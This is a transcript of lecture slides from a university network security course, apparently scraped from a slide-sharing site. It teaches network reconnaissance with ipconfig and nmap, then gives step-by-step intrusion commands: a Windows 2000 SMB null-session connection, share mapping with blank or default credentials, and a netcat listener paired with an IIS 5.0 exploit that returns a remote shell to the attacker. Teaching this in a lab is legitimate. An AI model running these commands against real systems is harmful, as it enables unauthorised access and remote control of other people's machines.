ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

Slides:



Advertisements
Similar presentations
 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,
Advertisements

Computer Security Fundamentals
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 5 Port Scanning.
Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning.
Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning Last updated
SYSTEM ADMINISTRATION Chapter 19
Operating Systems Concepts 1/e Ruth Watson Chapter 11 Chapter 11 Network Maintenance Ruth Watson.
Nassau Community College
Remote Viewing Setup DVR & IP Video Devices
Scanning February 23, 2010 MIS 4600 – MBA © Abdou Illia.
Chapter 8 Administering TCP/IP.
Computer Security and Penetration Testing
Enumeration. Local IP addresses Local IP addresses (review)  Some special IP addresses  localhost (loopback address)  Internal networks 
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.
Installing software on personal computer
TCP/IP Tools Lesson 5. Objectives Skills/ConceptsObjective Domain Description Objective Domain Number Using basic TCP/IP commands Understanding TCP/IP3.6.
Click to edit Master subtitle style Chapter 17: Troubleshooting Tools Instructor:
Remote Accessing Your Home Computer Using VNC and a Dynamic DNS Name.
Port Scanning.
Advanced Networking for DVRs
DHCP Server © N. Ganesan, Ph.D.. Reference DHCP Server Issues or leases dynamic IP addresses to clients in a network The lease can be subject to various.
Managing DHCP. 2 DHCP Overview Is a protocol that allows client computers to automatically receive an IP address and TCP/IP settings from a Server Reduces.
Basic Network Training. Cable/DSL Modem The modem is the first link in the chain It is usually provided by the ISP and often has a coax cable connector.
Chapter 6 Enumeration Modified Objectives  Describe the enumeration step of security testing  Enumerate Microsoft OS targets  Enumerate NetWare.
Microsoft Windows 2003 Server. Client/Server Environment Many client computers connect to a server.
Chapter Twelve Using TCP/IP on the Network. Objectives Here, we’ll examine how to configure TCP/IP. The concepts of subnetting will be examined in detail.
11 NETWORK PROTOCOLS AND SERVICES Chapter 10. Chapter 10: Network Protocols and Services2 NETWORK PROTOCOLS AND SERVICES  Identify how computers on TCP/IP.
Ana Chanaba Robert Huylo
Module 7: Configuring TCP/IP Addressing and Name Resolution.
Port Forwarding NeCrOs © 2008 Linksys® Routers Edition 1.What is Port Forwarding? 2.How to Port Forward? 3.How to Port Trigger? (Alternative Way) 4.How.
Hands-On Ethical Hacking and Network Defense
Remote Desktop Services Remote Desktop Connection Remote Desktop Protocol Remote Assistance Remote Server Administration T0ols.
CS391 Computer & Network Security
Network Operating Systems versus Operating Systems Computer Networks.
CIS 450 – Network Security Chapter 3 – Information Gathering.
COMP1321 Digital Infrastructure Richard Henson February 2014.
Connecting to a Network Lesson 5. Objectives Understand the OSI Reference Model and its relationship to Windows 7 networking Install and configure networking.
Guide to Linux Installation and Administration, 2e1 Chapter 2 Planning Your System.
Day 14 Introduction to Networking. Unix Networking Unix is very frequently used as a server. –Server is a machine which “serves” some function Web Server.
Scanning & Enumeration Lab 3 Once attacker knows who to attack, and knows some of what is there (e.g. DNS servers, mail servers, etc.) the next step is.
1 Security Penetration Testing Angela Davis Mrinmoy Ghosh ECE4112 – Internetwork Security Georgia Institute of Technology.
Topics Network topology Virtual LAN Port scanners and utilities Packet sniffers Weak protocols Practical exercise.
Networking in Linux. ♦ Introduction A computer network is defined as a number of systems that are connected to each other and exchange information across.
Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.
Networks Part 3: Packet Paths + Wireshark NYU-Poly: HSWP Instructor: Mandy Galante.
Hands-On Ethical Hacking and Network Defense
(ITI310) By Eng. BASSEM ALSAID SESSIONS 9: Dynamic Host Configuration Protocol (DHCP)
Windows Vista Inside Out Ch 13: Ch 13: Managing Shared Folders and Printers Last modified
Chapter 5. An IP address is simply a series of binary bits (ones and zeros). How many binary bits are used? 32.
ITMT Windows 7 Configuration Chapter 5 – Connecting to a Network ITMT 1371 – Windows 7 Configuration 1.
COMP1321 Digital Infrastructure Richard Henson March 2016.
Chapter 7: Using Network Clients The Complete Guide To Linux System Administration.
Jen Beveridge and Joe Kolenda. Developed by Gordon Lyon Features –Host discovery –Port scanning –Version detecting –OS detection –Scriptable interaction.
Microsoft OS Vulnerabilities April 1, 2010 MIS 4600 – MBA © Abdou Illia.
Virtual Machine and VirtualBox
Protection (tools).
CITA 352 Chapter 6 Enumeration.
Jen Beveridge and Joe Kolenda
Penetration Testing Scanning
Click to edit Master subtitle style
Troubleshooting a Network
Troubleshooting ip Chapter 5e.
CITA 352 Chapter 5 Port Scanning.
Intro to Ethical Hacking
By - Ricardo Sanchez, Ken Wolters and William Hibbard
Intro to Ethical Hacking
Virtual Machine and VirtualBox
Troubleshooting ip Chapter 5e.
Virtual Machine and VirtualBox
Virtual Machine and VirtualBox
Presentation transcript:

ITP 457 Network Security Network Hacking 101

Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target 3. Research the discovered services for known vulnerabilities 4. Attempt to exploit the services 5. Utilize exploited services to gain additional privileges from the target 6. Reiterate steps 1-5 until goals are achieved

Network Hacking Methodology changes slightly because we are focused at this point on security from the inside 1. Gather information & map the network 2. Scan systems to see what’s alive 3. Determine services running 4. Attempt to penetrate the systems (if you want )

Gathering Information Upon connection to the network Check your IP – normally automatically assigned Windows – ipconfig Linux – ifconfig

Useful information from ipconfig Physical Address – your computer’s MAC address IPAddress – the ip address assigned to your computer Subnet Mask – the mask used to limit the number of computers on the network Default gateway – the computer that is used to connect to ip addresses outside of the network DHCP server – the computer that distributes IP addresses DNS servers – the computer that translates domain names to IP addresses IPconfig will identify between 1 and 3 computers without any scanning! (DHCP, DNS, Gateway)

“Knock-knock” Ping sweep Ping – ICMP “echo request” packets Will return if host is reachable (alive) Single command: ping host Host can be an IP or a domain name (e.g. We want to see all the hosts on our particular network Nmap (or Umit) nmap –sP

Ping sweep vs. port scanning Why not start with port scanning? Normally, ping scanning is benign and will not get you in trouble or caught Port scanning is almost always seen as malicious Limit the amount of time that you are port scanning by just looking at systems that are alive Also, there may be multiple subnets (multiple parts of the network), with some not being occupied. A ping sweep will quickly determine if a particular IP range is up or not.

Determine Running Systems Portscan the system that you want to break into Nmap will give a great report, including port service numbers  very useful for determining what is vulnerable Nmap will also try to tell you what operating system they are running Is it always reliable?

Breaking in Once you’ve discovered what services are running, you have to see which are vulnerable Determine which service you want to break, and find a vulnerability Places to look:

Null Session Hack One of the oldest tricks for Windows 2000 Will allow any hard disk mounted in the Win2k machine to be mapped as a network drive on the hacker’s machine Utilizes a vulnerability in the SMB shares First, determine the IP address of the Windows 2000 machine Example:

Null Session Hack Cont’d Establish the null session net use \\ipaddress\ipc$ “” /u:””\\ipaddress\ipc$ This command establishes the null session connection

Get the list of the usernames The program Dumpsec will give you the usernames and a whole lot more bin/download.pl?DumpAcl Go to select computer, and enter the computer address Go to “Dump Users as Column”, and it will give you options to add more information to the report

DumpSec

Map the network drive The command “net use” can also be used to map the victim’s machine as a network drive on your computer Caveat: you must know an adminstrator’s username and password In our case, the user “Bob” does not have a password – typical for insecure computers Another common one: username “Administrator” password “Password” The command: net use Z: \\ \c$ “password” /u:”username”\\ \c$

Golly!

We want more! We’ve established a remote drive connection, but we cannot run any commands We need either a remote shell (windows command prompt) or a remote window (VNC or terminal services) Shell is easier, and does not require a lot of bandwidth

Remember the portscanning IIS was installed Version 5.0 So let’s take a look and see what’s available Download IIS5hack from the exploit section You will also need netcat Use the command: nc –l –p 1111 Tells netcat to listen on port 1111

The hack! With netcat running, open another command prompt, and enter the command: iis5hack.exe victim-ip your-ip port-number example: iis5hack.exe This will open up a remote shell in the netcat window MAKE SURE THE WINDOWS FIREWALL IS TURNED OFF!!!

What have you learned? Methodology of a hack How to remotely map a drive from a windows 2000 machine How to hack IIS 5.0

Your lab Find another way to hack into a Windows 2000 machine Find a way to hack into the Windows XP SP0 machine Give me step-by-step instructions on how you did it. What sites did you go to? What tools did you use?